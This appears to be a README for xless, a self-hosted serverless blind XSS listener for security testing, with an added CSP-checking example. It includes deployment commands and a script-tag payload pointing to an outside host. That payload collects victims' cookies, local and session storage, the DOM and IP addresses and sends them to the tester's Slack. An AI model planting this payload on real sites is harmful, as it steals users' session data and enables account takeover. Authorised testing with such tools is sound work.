xless: The Serverless Blind XSS App

xless is a serverless blind XSS app that you deploy yourself and use to identify blind XSS vulnerabilities. There is no need to run a full deployment process; just set up a zeit.co account and run bash deploy.sh. That’s it. You have a fully running blind XSS listener that uses Slack to notify you of blind XSS callbacks.

Requirements

  • zeit.co account: Zeit provides a free plan for serverless. If you use another provider for serverless, code changes should be minimal.
  • Slack Incoming Webhook URL.

Deployment

  1. Run:
$ git clone https://github.com/mazen160/xless.git
$ cd xless
$ bash deploy.sh

> Deploying ~/xless under X
> https://xless.now.sh [v2] [in clipboard] [4s]
> Success! Deployment ready [4s]
  2. Use the URL for blind XSS testing 🔥

Xless will automatically serve the XSS payload, collect information from the browser that runs it, and send that information to your serverless app, which forwards it to you in Slack.

Example Payload

<script src="https://xless.now.sh"></script>
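
Whether a script tag like the one above loads at all depends on the Content-Security-Policy of the page it lands in. The following is an added example, not part of xless: a simplified CSP check for an external script URL, where the function names, the sample policies and the https://app.example origin are assumptions made for illustration.

```javascript
// Added example: simplified CSP check for an injected external <script src>.
// Simplifications: ports and paths in host-sources are ignored, a host-source
// without a scheme matches any scheme, and the injected tag has no valid nonce.
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const [name, ...sources] = part.trim().toLowerCase().split(/\s+/);
    // The first occurrence of a directive wins; later duplicates are ignored.
    if (name && !directives.has(name)) directives.set(name, sources);
  }
  return directives;
}

function sourceMatches(source, url, pageOrigin) {
  if (source === "'self'") return url.origin === pageOrigin;
  if (source === '*') return ['http:', 'https:'].includes(url.protocol);
  if (/^[a-z][a-z0-9+.-]*:$/.test(source)) return url.protocol === source;
  if (source.startsWith("'")) return false; // 'none', nonces, hashes, keywords
  const m = source.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)/);
  if (!m) return false;
  if (m[1] && url.protocol !== m[1] + ':') return false;
  const host = m[2];
  return host.startsWith('*.')
    ? url.hostname.endsWith(host.slice(1)) // *.example.com: subdomains only
    : url.hostname === host;
}

function cspAllowsScript(policy, scriptUrl, pageOrigin) {
  const d = parseCsp(policy);
  const sources = d.get('script-src-elem') ?? d.get('script-src') ?? d.get('default-src');
  if (sources === undefined) return true; // nothing governs script loads
  // With 'strict-dynamic', host and scheme allowlists are ignored.
  if (sources.includes("'strict-dynamic'")) return false;
  const url = new URL(scriptUrl);
  return sources.some((s) => sourceMatches(s, url, pageOrigin));
}

// Constructed sample policies; PAGE_ORIGIN is a hypothetical application.
const PAGE_ORIGIN = 'https://app.example';
const PAYLOAD_SRC = 'https://xless.now.sh'; // script URL from the payload above
for (const policy of [
  '',
  "default-src 'self'",
  "script-src 'self' https:",
  "script-src 'nonce-r4nd0m' 'strict-dynamic' https:",
]) {
  const verdict = cspAllowsScript(policy, PAYLOAD_SRC, PAGE_ORIGIN) ? 'LOADS' : 'blocked';
  console.log(`${verdict.padEnd(8)} ${policy || '(no CSP)'}`);
}
```

A missing policy and a broad scheme allowlist such as https: both let the script load; 'self' or a nonce-based policy blocks it.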

Collected Data

  • Cookies
  • User-Agent
  • HTTP Referrer
  • Browser DOM
  • Browser Time
  • Document Location
  • Origin
  • LocalStorage
  • SessionStorage
  • IP Address

Copyright (C) 2019 Mazin Ahmed

Source: https://github.com/mazen160/